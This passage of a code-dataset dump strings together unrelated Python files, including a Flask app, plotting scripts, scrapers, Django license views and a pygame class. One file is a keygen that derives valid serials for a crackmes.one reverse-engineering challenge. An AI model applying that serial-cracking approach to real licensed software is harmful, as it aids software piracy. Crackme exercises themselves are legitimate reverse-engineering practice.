logging\nfrom flask import Flask\nfrom pymacaron import API, letsgo\n\nlog = logging.getLogger(__name__)\n\napp = Flask(__name__)\n\n\ndef my_error_reporter(title, msg):\n \"\"\"This method receives all errors that should be reported up to site admins\"\"\"\n log.info(\"Helloworld error reporter received [%s] [%s]\" % (title, msg))\n\n\ndef start(port, debug):\n here = os.path.dirname(os.path.realpath(__file__))\n path_apis = os.path.join(here, \"apis\")\n\n api = API(\n app,\n port=port,\n debug=debug,\n error_reporter=my_error_reporter,\n )\n api.load_apis(path_apis)\n api.start(serve=\"helloworld\")\n\n\nletsgo(__name__, callback=start)\n","sub_path":"digram-backend/diagflow/src/com/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"24766449","text":"from plotly.subplots import make_subplots\r\nimport plotly.graph_objects as go\r\nimport pandas as pd\r\nimport os\r\n\r\n\r\nathletes_df = pd.read_excel(os.path.join('datasets', 'olympics2021', 'Athletes.xlsx'), engine='openpyxl')\r\nmedals_df = pd.read_excel(os.path.join('datasets', 'olympics2021', 'Medals.xlsx'), engine='openpyxl')\r\n\r\nathletes_group = athletes_df.groupby(['NOC', 'Discipline']).count().reset_index()\r\nsports_group = athletes_df.groupby('Discipline').count().reset_index()\r\nmedals_group = medals_df.groupby(['Team/NOC', 'Gold', 'Silver', 'Bronze', 'Total']).count().reset_index()\r\n\r\naverage_medals_won = sum(medals_group['Total']) // len(medals_group['Team/NOC'])\r\naverage_athletes_sport = sum(sports_group['Name']) // len(sports_group['Discipline'])\r\n\r\n\r\nfig = make_subplots(\r\n rows = 8,\r\n cols = 2,\r\n specs = [[{'type': 'bar', 'colspan': 2, 'rowspan': 2}, None],\r\n [{'type': 'scatter', 'colspan': 2}, None],\r\n [None, None],\r\n [None, None],\r\n [{'type': 'scatter', 'colspan': 2, 'rowspan': 2}, None],\r\n [{'type': 'scatter', 'colspan': 2}, None],\r\n [None, None],\r\n [None, None],])\r\n\r\nfig.add_trace(\r\n go.Bar(x = athletes_group['Discipline'],\r\n y = athletes_group['Name'],\r\n name = 'Country',\r\n marker = {\r\n 'color': 'orange'\r\n },\r\n hovertext = athletes_group['NOC'],\r\n marker_line_width = 0.25,),\r\n row = 1, col = 1)\r\n\r\nfig.add_trace(\r\n go.Scatter(x = athletes_group['Discipline'],\r\n y = [average_athletes_sport] * len(athletes_group['Discipline']),\r\n name = 'Average Athlete by Sport',\r\n mode = 'lines',\r\n marker = {\r\n 'color': 'green'\r\n },\r\n opacity = 0.25,\r\n hovertext = 'Average Athletes/Sport'),\r\n row = 1, col = 1\r\n)\r\n\r\nfig.add_trace(\r\n go.Scatter(x = medals_group['Team/NOC'],\r\n y = medals_group['Total'],\r\n name = 'Medals',\r\n mode = 'markers',\r\n marker = {\r\n 'color': 'red',\r\n },\r\n hovertext = medals_group['Total'],),\r\n row = 5, col = 1) \r\n\r\nfig.add_trace(\r\n go.Scatter(x = medals_group['Team/NOC'],\r\n y = [average_medals_won] * len(medals_group['Team/NOC']),\r\n mode = 'lines',\r\n name = 'Average Medals Won',\r\n marker = {\r\n 'color': 'blue',\r\n },\r\n opacity = 0.25,\r\n hovertext = 'Average Medals Won'),\r\n row = 5, col = 1\r\n )\r\n\r\nfig.update_yaxes(title_text = 'No. of Athletes', row = 1, col = 1)\r\nfig.update_yaxes(title_text = 'Total Medals', row = 5, col = 1)\r\n\r\nfig.show()\r\n","sub_path":"olympicsplot.py","file_name":"olympicsplot.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"272752677","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 20 15:10:44 2018\n\n@author: Jarnd\n\"\"\"\nimport time\nimport sys\nsys.path.append('../Circuits/BitwiseFTSWAP')\nsys.path.append('../Functions')\n\nfrom FTSWAP import nq, gates, p_s, p_m\n\nimport simulationfunctions as smf\n\nimport itertools as itt\n\n\nPs = ['X','Y','Z']\nMs = ['X','Y','Z','I']\nk = 0\nstart_time = time.time()\nfor iteration in itt.product(Ps, repeat = nq):\n if iteration == ('I',)*nq: continue\n for phase_iteration in itt.product([0,2], repeat = nq):\n for meas_iteration in itt.product(Ms, repeat = nq):\n #print('initial state',list(iteration))\n measurements = smf.run_one_round(nq,iteration,phase_iteration,gates,p_m,p_s,list(meas_iteration))\n k+=1\n \n\nstop_time = time.time()\nprint(stop_time - start_time)","sub_path":"Simulating/tomo_FTSWAP.py","file_name":"tomo_FTSWAP.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"127974230","text":"from numpy import arange, zeros, ones\nfrom pylab import plot, show, ylim\n\nG = 6.674e-11\nMe = 5.974e24\nMm = 7.348e22\n\nR = 3.844e8\n\nw = 2.662e-6\n\nk = w/G/Me\ndistance = arange(1e6, 5e8, 1.01e5)\n\nf = zeros(len(distance))\nx_axis = zeros(len(distance))\nf1 = ones(len(distance))\nf1 = f1 * R\n\nfor i in range(len(distance)):\n r = distance[i]\n f[i] = G*Me/r/r - G*Mm/(R-r)/(R-r) - w*w*r\n\nplot(distance,f)\nplot(distance,x_axis)\nplot(f1,f)\n\nylim(-0.1,0.20)\n","sub_path":"LP.py","file_name":"LP.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"192624635","text":"# common installs\n# pip install bs4\n\n# common imports\nfrom bs4 import BeautifulSoup, Comment\nimport requests\nfrom googlesearch import search\nimport html2text\n\n# get text content\ndef get_text(url):\n r = requests.get(url)\n soup = BeautifulSoup(r.content, 'lxml')\n all_text = ''\n for text in soup.body.find_all(string=True):\n if text.parent.name not in ['script', 'meta', 'style'] and not isinstance(text, Comment) and text.strip() != '':\n #print(text.strip(), '-----------------')\n all_text += ' '+text.strip()\n return all_text\n\ndef google_query(query):\n for res in search(query, num=5, stop=5):\n headers = {\"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0\",\n \"Accept\": \"text/html,application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\":\"gzip, deflate\", \"DNT\": \"1\",\n \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\"}\n r = requests.get(res, headers=headers)\n h = html2text.HTML2Text()\n h.ignore_links=True\n doc = h.handle(r.text)\n print(doc)\n","sub_path":"src/web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"614628802","text":"from django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, InvalidPage\nfrom django.db.models import CharField\nfrom django.db.models import Q\nfrom django.http import Http404, HttpResponse\nfrom django.shortcuts import render_to_response, redirect\nfrom django.template import RequestContext\n\nfrom .excel_utils import WriteToExcel\nfrom .models import *\n\n\n# Create your views here.\n\n@login_required\ndef index(request):\n if not request.user.is_authenticated():\n return redirect('/login/')\n licenses_list = LicenseInfo.objects.all()\n paginator = Paginator(licenses_list, 10)\n\n try:\n page = int(request.GET.get('page', '1'))\n except:\n page = 1\n\n try:\n licenses = paginator.page(page)\n except(EmptyPage, InvalidPage):\n licenses = paginator.page(paginator.num_pages)\n\n return render_to_response(\"index.html\", {\"licenses\": licenses, \"licenses_list\": licenses_list},\n context_instance=RequestContext(request))\n\n\ndef act(request):\n licenses = LicenseInfo.objects.all()\n user = request.user\n if request.method == 'POST':\n to_print = request.POST.getlist('to_print')\n licenses = LicenseInfo.objects.filter(id__in=to_print)\n response = HttpResponse(content_type='application/vnd.ms-excel')\n response['Content-Disposition'] = 'attachment; filename=export.xlsx'\n xlsx_data = WriteToExcel(licenses, user)\n response.write(xlsx_data)\n return response\n return render_to_response(\"act.html\", {\"licenses\": licenses},\n context_instance=RequestContext(request))\n\n\ndef add(request):\n form = LicenseInfoForm(request.POST or None)\n if request.method == 'POST' and form.is_valid():\n form.save()\n return redirect('/')\n\n return render_to_response(\"add_license.html\", {\"form\": form},\n context_instance=RequestContext(request))\n\n\ndef search(request):\n error = False\n if 'q' in request.GET and request.GET['q'] is not None:\n error = False\n q = request.GET['q']\n fields = [f for f in LicenseInfo._meta.fields if isinstance(f, CharField)]\n queries = [Q(**{f.name + '__contains': q}) for f in fields]\n\n qs = Q()\n for query in queries:\n qs = qs | query\n\n licenses = LicenseInfo.objects.filter(qs)\n return render_to_response(\"search_results.html\", {'licenses': licenses, 'query': q},\n context_instance=RequestContext(request))\n\n return render_to_response(\"search.html\", {'error': error},\n context_instance=RequestContext(request))\n\n\ndef edit(request, rec_id):\n try:\n rec_id = int(rec_id)\n except ValueError:\n raise Http404()\n\n license_rec = LicenseInfo.objects.get(id=rec_id)\n\n form = LicenseInfoForm(instance=license_rec)\n if request.POST:\n before_edit = LicenseInfo.objects.get(id=rec_id)\n form = LicenseInfoForm(request.POST, request.FILES, instance=before_edit)\n if form.is_valid():\n j = form.save(commit=False)\n j.save()\n return redirect('/')\n else:\n form = LicenseInfoForm(instance=license_rec)\n\n return render_to_response(\"edit.html\", {\"form\": form},\n context_instance=RequestContext(request))\n\n\ndef delete(request, rec_id):\n try:\n rec_id = int(rec_id)\n except ValueError:\n raise Http404()\n\n license_rec = LicenseInfo.objects.get(id=rec_id)\n if request.POST:\n license_rec.delete()\n return redirect(\"/\")\n else:\n redirect(\"/\")\n\n return render_to_response(\"delete.html\", {\"license_rec\": license_rec},\n context_instance=RequestContext(request))\n","sub_path":"frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"580010916","text":"import pygame\nimport math\n\nfrom effects.Explosion import Explosion\n \nclass PlayerProjectile(pygame.sprite.Sprite):\n \"\"\"This class is base class for all bullet projectiles by the player.\n\n \"\"\"\n def __init__(self, game, player, pos):\n \"\"\"__init__ method for PlayerProjectile class\n\n Args:\n game (Integrate.Game): Integrate.Game class object.\n player (Player.Player): Player.Player class object.\n pos (tuple length 2) : position of the player (x,y).\n\n \"\"\"\n self.group = game.all_sprites\n self.layer = 1\n pygame.sprite.Sprite.__init__(self)\n self.group.add(self, layer=self.layer)\n self.player = player\n self.game = game\n self.Blst = []\n self.vel = pygame.math.Vector2(0, 0)\n self.anim_update = 0\n self.current_frame = 0\n self.angle = 0\n self.bulletlst = []\n \n self.state = 'SHOT'\n self.pos = (0,0)\n self.dir = self.player.lastdir # set own direction based on the direction the player sprite is facing\n \n self.image = pygame.transform.rotozoom(self.image, self.game.player.angle3, 1)\n \n position = pygame.mouse.get_pos()\n Bangle = math.degrees(math.atan2(position[1]-(self.game.player.pos.y),position[0]-(self.game.player.pos.x)))\n A = self.game.player.pos.x + math.cos(math.radians(Bangle))*35\n B = self.game.player.pos.y + math.sin(math.radians(Bangle))*35\n self.bulletlst.append([math.atan2(position[1]-(self.game.player.pos.y),position[0]-(self.game.player.pos.x)),A,B])\n self.mask = pygame.mask.from_surface(self.image)\n self.maskbount = self.mask.get_bounding_rects()\n self.rect = self.image.get_rect()\n self.rect.center = self.pos\n self.hit_rect = self.maskbount[0]\n self.hit_rect.center = self.rect.center\n\n\n def collide_hit_rect(self, one, two):\n \"\"\"PlayerProjectile class method to check if two objects are colliding.\n\n \"\"\"\n return one.hit_rect.colliderect(two.hit_rect)\n \n \n def update(self):\n \"\"\"PlayerProjectile class method to update the PlayerProjectile motion of player bullet and its effects.\n\n \"\"\"\n if self.state == 'SHOT':\n # effects of hiting an explotion crate\n hits_walls = pygame.sprite.spritecollide(self, self.game.walls, False, self.collide_hit_rect)\n for wall in hits_walls:\n if wall.image == self.game.imageLoader.solid_img['crate']:\n images = self.game.imageLoader.effects['crate_explosion']\n Explosion(self.game, pygame.math.Vector2(self.pos), images, 80, damage = 0.2,\n sound=self.game.soundLoader.get['explosiveTank'],\n hit_rect=pygame.Rect(images[0].get_rect().inflate(-6, -6)))\n wall.kill()\n\n # change the state to hits wall and later destroy bullet\n if hits_walls:\n self.state = 'HIT_WALL'\n\n # update the bullet velocity and position\n for bullet in self.bulletlst:\n velx=math.cos(bullet[0])*5\n vely=math.sin(bullet[0])*5\n if self.game.player.MoveCheck == True:\n bullet[1]+=velx\n bullet[2]+=vely\n for PlayerProjectile in self.bulletlst:\n self.acc = PlayerProjectile\n \n # cause damage to enemies if bullet hits them\n hits_enemies = pygame.sprite.spritecollide(self, self.game.enemies, False, self.collide_hit_rect)\n # change the state to hit enemies and later destroy bullet\n if hits_enemies:\n for enemy in hits_enemies:\n enemy.hp -= self.damage\n self.state = 'HIT_ENEMY'\n self.enemy = enemy\n\n # updates the position of the bullet.\n self.pos = (self.acc[1], self.acc[2])\n \n else:\n self.destroy()\n \n self.rect.center = self.pos\n self.hit_rect.center = self.rect.center\n \n # animate the motion of bullet\n try: \n self.animate()\n except:\n # has no animation frames\n pass\n \n \n def animate(self):\n \"\"\"PlayerProjectile class method to animate the bullet PlayerProjectile.\n\n \"\"\"\n now = pygame.time.get_ticks()\n if now - self.anim_update > self.anim_speed:\n self.anim_update = now\n self.current_frame = (self.current_frame + 1) % len(\n self.image_frames)\n self.image = self.image_frames[self.current_frame]\n \n \n def destroy(self):\n \"\"\"PlayerProjectile class method to destroy the bullet.\n\n \"\"\"\n self.vel *= 0\n self.kill()\n\n \n","sub_path":"bullets/PlayerProjectile.py","file_name":"PlayerProjectile.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"314834241","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 20 17:23:15 2017\n\n@author: Radik\n\"\"\"\n\nimport urllib.request\nimport re\nfrom bs4 import BeautifulSoup\n\nurl = 'http://www.fsin-atlas.ru/catalog/region/cheliabinsk/'\n \nsock = urllib.request.urlopen(url)\nbsObj = BeautifulSoup(sock.read(),\"html.parser\")\n\nminiitems = bsObj.findAll(\"div\",{\"class\":\"item small \"})\nminiitems2 = bsObj.findAll(\"div\",{\"class\":\"item small odd\"})\nc = len(miniitems)+len(miniitems2)\nfa = open(\"sizo.json\", \"w\", encoding='utf-8')\nfa.write('{\"total\":\"'+str(c)+'\",\"items\":[') \nfor j in range(0,c):\n firm_name =\"\"\n try:\n firmname = bsObj.findAll(\"div\",{\"class\":\"title\"})\n firm_name=firmname[j].get_text() \n except:\n firm_name=\"\"\n url_name =\"\"\n try:\n urlname = bsObj.findAll(\"a\",{\"class\":\"read_more\"})\n url_name=urlname[j].attrs[\"href\"] \n except:\n url_name=\"\"\n # print (firm_name + \" \"+url_name)\n url2 = 'http://www.fsin-atlas.ru'+url_name\n sock2 = urllib.request.urlopen(url2)\n bsObj2 = BeautifulSoup(sock2.read(),\"html.parser\")\n options = bsObj2.findAll(\"ul\",{\"class\":\"options\"})\n adres =options[0].findAll('li')[3].get_text().replace('\"',\"'\")\n desc = options[0].findAll('li')[4].get_text().replace('\"',\"'\")\n temp =options[0].findAll('li')[5].prettify() \n i = temp.find('Контакты') \n info =''\n contacts = ''\n try:\n if i>0:\n contacts = temp.replace('\"',\"'\")\n else:\n i = temp.find('Начальник:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[6].prettify() \n i = temp.find('И.О. начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[6].prettify() \n i = temp.find('ИО начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[6].prettify()\n temp =options[0].findAll('li')[6].prettify() \n i = temp.find('Контакты') \n if i>0:\n contacts = temp.replace('\"',\"'\")\n else:\n i = temp.find('Начальник:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[7].prettify() \n i = temp.find('И.О. начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[7].prettify()\n i = temp.find('ИО начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[7].prettify()\n \n temp =options[0].findAll('li')[7].prettify() \n i = temp.find('Контакты') \n if i>0:\n contacts = temp.replace('\"',\"'\")\n else:\n i = temp.find('Начальник:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[8].prettify()\n i = temp.find('И.О. начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[8].prettify()\n i = temp.find('ИО начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[8].prettify()\n \n temp =options[0].findAll('li')[8].prettify() \n i = temp.find('Контакты') \n if i>0:\n contacts = temp.replace('\"',\"'\")\n else:\n i = temp.find('Начальник:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[9].prettify()\n i = temp.find('И.О. начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[9].prettify()\n i = temp.find('ИО начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[9].prettify()\n \n temp =options[0].findAll('li')[9].prettify() \n i = temp.find('Контакты') \n if i>0:\n contacts = temp.replace('\"',\"'\")\n else:\n i = temp.find('Начальник:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[10].prettify()\n i = temp.find('И.О. начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[10].prettify()\n i = temp.find('ИО начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[10].prettify()\n \n except:\n print('-')\n\n maps = bsObj2.findAll(\"div\",{\"class\":\"map\"}) \n yamap = maps[0].prettify().replace('//', 'https://').replace('\"',\"'\")\n #\"geometry\":{\"type\":\"Point\",\"coordinates\":[61.39455,55.16339]},\n jssrc = maps[0].findAll(\"script\",{\"src\":True})\n url3 = 'https:'+jssrc[0]['src']\n sock3 = urllib.request.urlopen(url3).read().decode(\"utf-8\")\n patC= re.compile('\"coordinates\":(.+?)},\"options\"')\n coords = patC.findall(sock3)[0].replace('[',\"\").replace(']','')\n contacts = re.sub(r'','',contacts).replace('','
    ')\n contacts = re.sub(r'','',contacts).replace('','
    ')\n contacts =contacts.replace('

    ','
    ')\n contacts =contacts.replace('
    ','')\n contacts =contacts.replace(' ',' ')\n contacts =contacts.replace(' ',' ')\n contacts =contacts.replace(' ',' ')\n info = re.sub(r'','',info).replace('','
    ')\n info = re.sub(r'','',info).replace('','
    ')\n info =info.replace('

    ','
    ')\n info =info.replace('
    ','')\n info =info.replace(' ',' ')\n info =info.replace(' ',' ')\n info =info.replace(' ',' ')\n if j<(c-1):\n fa.write('{\"fname\":\"'+firm_name+'\",\"adr\":\"'+adres.replace('\\n','')+'\",\"desc\":\"'+desc.replace('\\n','')+'\",\"contacts\":\"'+contacts.replace('\\n','')+'\",\"info\":\"'+info.replace('\"',\"'\").replace('\\n','')+'\",\"coords\":\"'+coords+'\",\"yamap\":\"'+yamap.replace('\\n','')+'\"},') \n else:\n fa.write('{\"fname\":\"'+firm_name+'\",\"adr\":\"'+adres.replace('\\n','')+'\",\"desc\":\"'+desc.replace('\\n','')+'\",\"contacts\":\"'+contacts.replace('\\n','')+'\",\"info\":\"'+info.replace('\"',\"'\").replace('\\n','')+'\",\"coords\":\"'+coords+'\",\"yamap\":\"'+yamap.replace('\\n','')+'\"}') \nfa.write(']}') \nfa.close() \nprint('ok')","sub_path":"BeautifulSoup/sizoparser.py","file_name":"sizoparser.py","file_ext":"py","file_size_in_byte":6647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"150283950","text":"# Crackmes.one\n# Crackme:\n# Level 1\n# https://github.com/JavierYuste/---\nimport argparse\n\nparser=argparse.ArgumentParser(description=\"Keygen\")\nparser.add_argument(\"name\",metavar=\"name\",help=\"The name you wanna type\",type=str)\n\nif __name__ == '__main__':\n args=parser.parse_args()\n\n # Loop\n var13C = 0\n var29C = 0\n i = 0\n while var29C < len(args.name):\n var13C = var13C + ord(args.name[i:i+1])\n var29C = var29C + 1\n i = i + 1\n\n print('Valid serials for ' + args.name)\n # First serial = NAME.length + 0x6E + NAME.substr(0,1) + var13C\n print('[+] First solution: ' + str(len(args.name)) + str(int(0x6E)) + str(ord(args.name[:1])) + str(var13C))\n\n # Second serial = NAME.substr + 0x5F + var13C + NAME.\n print('[+] Second solution: ' + str(ord(args.name[:1])) + str(int(0x5F)) + str(var13C) + str(len(args.name)))\n\n # Third serial = var13C + 0x55 + NAME.length + NAME.substr\n print('[+] Third solution: ' + str(var13C) + str(int(0x55)) + str(len(args.name)) + str(ord(args.name[:1])))\n","sub_path":"Crackmes_one/Level 1/simpledatas_keygenme_1/keygen.py","file_name":"keygen.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"640798703","text":"import numpy as np\nimport pandas as pd\nfrom collections import Counter\n\n#Reading .txt file\ndef txt(filename):\n with open(filename,mode='rt') as file:\n return file.read()\n\nd1=txt(\"./stories/bbc-khashoggi.txt\")\nd2=txt(\"./stories/fox-khashoggi.txt\")\nd3=txt(\"./stories/cnn-khashoggi.txt\")\nd4=txt(\"./stories/breitbart-khashoggi.txt\")\nd5=txt(\"./stories/aljazeera-khashoggi.txt\")\n\n#Reading the stop_words CSV and converting it into a list\nstopwords = pd.read_csv('stop_words.csv')\nsw_list = list(stopwords['word'].values)\n\ndef tokenize(text=None):\n '''\n Reads the text stored in respective variables and performs a text\n cleaning exercise\n\n Arguments:\n text: the text from the article in str format\n\n Returns:\n A list in which\n -each word is a separate element in a list\n -each word is in lower case\n -each word which has a \".\", \",\", \"\"\", \"\\'s\", \"-\", \"(\", \")\", \"?\", \"$\", \"£\",\n \"bn\", \"!\", \"’s\", \"”\", \":\", \"“\", \"—\", \"[\", \"]\" is replaced by an empty space\n -each word having \"killing\" and \"killed\" is replaced with \"kill\"\n -each word having \"admitting\" and \"admitted\" is replaced with \"admit\"\n -removes word which has an integer in it\n\n Raises:\n No output errors built in to function.\n '''\n text = text.lower()\n replace=['.',',','\"',\"\\'s\",\"-\",\"(\",\")\",\"?\",\"$\",\"£\",\"bn\",\"!\",\"’s\",\"”\",\":\",\"“\",\"—\",\"[\",\"]\"]\n #Loop logic: courtesy Zach\n for i in replace:\n text=text.replace(i,'')\n replace_kill=[\"killing\",\"killed\"]\n for j in replace_kill:\n text=text.replace(j,'kill')\n replace_admit=[\"admitting\",\"admitted\"]\n for k in replace_admit:\n text=text.replace(k,'admit')\n text_list = text.split()\n text_list2 = [word for word in text_list if word not in sw_list]\n text_list3 = [word for word in text_list2 if not word.isdigit()]\n return text_list3\n ##Lily: I am actually not sure why you had the for loops\n ##to replace killing, admitting, and k. I think the text_list2 shoudl\n ##do the work\n\ndef convert_tokens_to_entry(tokens):\n '''\n Converts tokens into count entries for a document term matrix.\n '''\n d = {key:[value] for key,value in Counter(tokens).items()}\n return pd.DataFrame(d)\n\ndef gen_DTM(texts=None):\n '''\n Generate a document term matrix\n '''\n DTM = pd.DataFrame()\n for text in texts:\n tokens = tokenize(text)\n entry = convert_tokens_to_entry(tokens)\n\n # Append (row bind) the current entry onto the existing data frame\n DTM = DTM.append(pd.DataFrame(entry),ignore_index=True,sort=True)\n\n # Fill in any missing values with 0s (i.e. when a word is in one text but not another)\n DTM.fillna(0, inplace=True)\n return DTM\n\n#Consolidating all results in one variable\ntest = gen_DTM([d1,d2,d3,d4,d5])\n\n#Converting above test data into list form\nall_docs=[i for i in test.values]\n\n#Cosine logic\ndef cosine(a,b):\n cos = np.dot(a,b)/(np.sqrt(np.dot(a,a)) * np.sqrt(np.dot(b,b)) )\n return cos\n\n#Creating a matrix of 5x5 with zeroes in it\nmat = np.zeros((5,5))\n\nfor i in range(len(all_docs)):\n for j in range(len(all_docs)):\n mat[i][j]=round(cosine(all_docs[i],all_docs[j]),3)\n\nlabels=[\"BBC\",\"Fox\",\"CNN\",\"Breitbart\",\"Aljazeera\"]\n\nfinal=pd.DataFrame(mat,labels,labels)\nprint(final)\n\n#Most similarity in news is between Fox and Al-Jazeera news\n#Least similarity in news is between CNN & Brietbart\n","sub_path":"hs957_sharda.py","file_name":"hs957_sharda.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"376219975","text":"from django.conf.urls import patterns, url\n\nfrom custom.ilsgateway.slab.views import SLABConfigurationView, SLABEditLocationView\nfrom custom.ilsgateway.views import SupervisionDocumentListView, SupervisionDocumentDeleteView, \\\n SupervisionDocumentView, ReportRunListView, ReportRunDeleteView, DashboardPageRedirect, GlobalStats\nfrom custom.ilsgateway.views import ILSConfigView\n\nurlpatterns = patterns('custom.ilsgateway.views',\n url(r'^ils_dashboard_report/$', DashboardPageRedirect.as_view(), name='ils_dashboard_report'),\n url(r'^ils_config/$', ILSConfigView.as_view(), name=ILSConfigView.urlname),\n url(r'^global_stats/$', GlobalStats.as_view(), name=GlobalStats.urlname),\n url(r'^run_reports/$', 'run_warehouse_runner', name='run_reports'),\n url(r'^end_report_run/$', 'end_report_run', name='end_report_run'),\n url(r'^supervision/$', SupervisionDocumentListView.as_view(), name=SupervisionDocumentListView.urlname),\n url(r'^delete_supervision_document/(?P\\d+)/$', SupervisionDocumentDeleteView.as_view(),\n name='delete_supervision_document'),\n url(r'^supervision/(?P\\d+)/$', SupervisionDocumentView.as_view(), name='supervision_document'),\n url(r'^save_ils_note/$', 'save_ils_note', name='save_ils_note'),\n url(r'^report_runs/(?P\\d+)/delete/$', ReportRunDeleteView.as_view(), name='delete_report_run'),\n url(r'^report_runs/$', ReportRunListView.as_view(), name='report_run_list'),\n url(r'^slab_configuration/$', SLABConfigurationView.as_view(), name='slab_configuration'),\n url(r'^slab_edit_location/(?P[\\w-]+)', SLABEditLocationView.as_view(), name='slab_edit_location')\n)\n","sub_path":"custom/ilsgateway/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"118431236","text":"#!/usr/bin/env python3\n\nfrom time import sleep\n\nfrom deck import Deck\n#from curses_render import CursesRenderer as Renderer\nfrom text_render import TextRenderer as Renderer\n\ndef overflow_test(deck, render):\n\tcard = deck.draw()\n\ttry:\n\t\tfor i in range(100000):\n\t\t\trender.show(card)\n\t\t\tsleep(0.1)\n\texcept OverflowError:\n\t\tsleep(1)\n\t\trender.clear()\n\ndef main():\n\trender = Renderer()\n\tdeck = Deck()\n#\thand = deck.deal(len(deck))\n#\tfor i in range(len(hand)):\n#\t\trender.show(hand[i])\n\toverflow_test(deck, render)\n\trender.getinput(render.waitprompt)\n\tdel render\n\tdel deck\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"211737276","text":"\"\"\"\nLab Evaluation of Python CAP930\nProf. Manikant Roy\n11707259\n\"\"\"\n\nemployee = {\"Personal Details\":({\"First Name\":\"Amalendu\", \"Last Name\":\"Kar\",\"Date Of Birth\":\"26/01/1995\",\n \"Address\":{\"Permanant\":{\"City\":\"Bethuadahari\",\"Dist\":\"Nadia\",\"Pin\":741126,\"State\":\"WestBengale\"}},\"AdharId\":(1475126987452364)}), #using Tupple For Adharcard\n \"Academic Details\":{\"School\":{\"Course\":\"10+2\",\"Name\":\"Bethuadahari JCM High School\",\n \"Address\":{\"City\":\"Bethuadahari\",\"pin\":741126,\"Dist\":\"Nadia\",\"State\":\"West Bengal\",\"Board\":\"State Board\"}},\n \"College\":{\"Course\":\"BCA\",\"Name\":\"Lovely Professional University\",\n \"Address\":{\"City\":\"Phagwara\",\"pin\":114111,\"Dist\":\"Jalandhar\",\"State\":\"Punjab\",\"University\":\"Lovely Professional University\"}}\n },\n \n \"Contact Deatils\":{\"Mob Num\":[9874938545,8609834146],\"Email\":[\"amal1995kar@gmail.com\",\"amalendu@gmail.com\"]}, #using List For Mustiple Phone Numbers and Emails\n \"Professional Deatils\":{\"Organigation\":\"TCS\",\"EmployeeID\":(11707259),\"Position\":\"Event Manager\",\"Join Date\":(\"11/2/2014\")}\n \n \n }\n\n#print Dictonary of Employee\nfor k, v in employee.items():\n print(k,v)\n","sub_path":"pythontest.py","file_name":"pythontest.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"588741195","text":"import nltk\r\nimport sys\r\nfrom src import helpers\r\nfrom nltk.tokenize import TweetTokenizer as tokenizer\r\n\r\ndef main(tweets, award, sw, is_person):\r\n\tif 'cecil' in award:\r\n\t\treturn []\r\n\r\n\tnominee_candidates = {}\r\n\tnominee_sw = ['nominee', 'nominated', 'nomination', 'nominate', 'nominees', 'nominations']\r\n\r\n\tif is_person:\r\n\t\tlow, high = 2, 3\r\n\telse:\r\n\t\tlow, high = 1, 3\r\n\ttkn_award = tokenizer().tokenize(award)\r\n\r\n\tfor tweet in tweets:\r\n\t\ttrash = True\r\n\t\tlower_tweet = [x.lower() for x in tweet['clean']]\r\n\t\tif any([s in lower_tweet for s in nominee_sw]):\r\n\t\t\tlower_raw = [tkn.lower() for tkn in tweet['raw']]\r\n\t\t\tclean_tweet = [tkn for tkn in lower_tweet if all([tkn not in stop for stop in [sw, 